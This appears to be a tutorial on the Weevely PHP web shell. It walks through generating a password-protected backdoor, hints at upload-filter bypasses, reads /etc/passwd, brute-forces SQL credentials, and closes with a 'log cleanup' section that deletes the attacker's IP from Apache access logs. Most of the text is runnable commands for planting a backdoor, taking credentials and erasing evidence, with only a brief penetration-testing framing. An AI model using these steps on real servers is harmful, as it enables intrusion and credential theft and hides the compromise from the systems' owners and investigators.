Weevely tutorial: from basic to advance PHP web shell

Weevely is a webshell management tool written in python. Weevely tutorial article describes from basic to advance its most function on your penetration testing. Weevely is available on Kali Linux.

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation, and network lateral movement, even in the restricted environment.


  • Ssh-like terminal
  • SQL console pivoted on target
  • HTTP proxy pivoted on target
  • Host configuration security auditing
  • Mount of the remote filesystem
  • Network scan pivoted on target
  • File upload and download
  • Reverse and direct TCP shell
  • Meterpreter support
  • Service account bruteforce
  • Compressed archive management



root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade

root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev


weevely tutorial - php webshell

Generate a backdoor

root@ddos:~# weevely generate ddos ddos.php
Generated backdoor with password ‘ddos’ in ‘ddos.php’ of 1439 byte size.

root@ddos:/usr/share/weevely# ls
bd core ddos.php modules utils weevely.py

You need to use some technique for uploading webshell like double extension, bypass image type validation, bypass whitelist/blacklist. View here.

Connect to the backdoor

root@ddos:/usr/share/weevely# weevely ddos

Bypass Policy to Read /etc/passwd

www-data@ddos:/etc $ audit_etcpasswd

Guess the SQL user credentials

This tip teaches you how to guess the credentials of multiple SQL users.

weevely> bruteforce_sql –help

Log cleanup

This skill to teach you how to clear the server in the tracking records.

We use the system_info command to find our own ip

www-data@ddos:/var/log $ system_info -info client_ip

We use the grep command to confirm that our ip records in the log file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “”

we can see that the activities of our IP address have been recorded, we can again use grep to remove our log from the ip, and then save it to a temporary file

www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “” > cleaned.log

Let’s test to see if we’ve deleted it

Then we can replace cleaned.log to access.log.1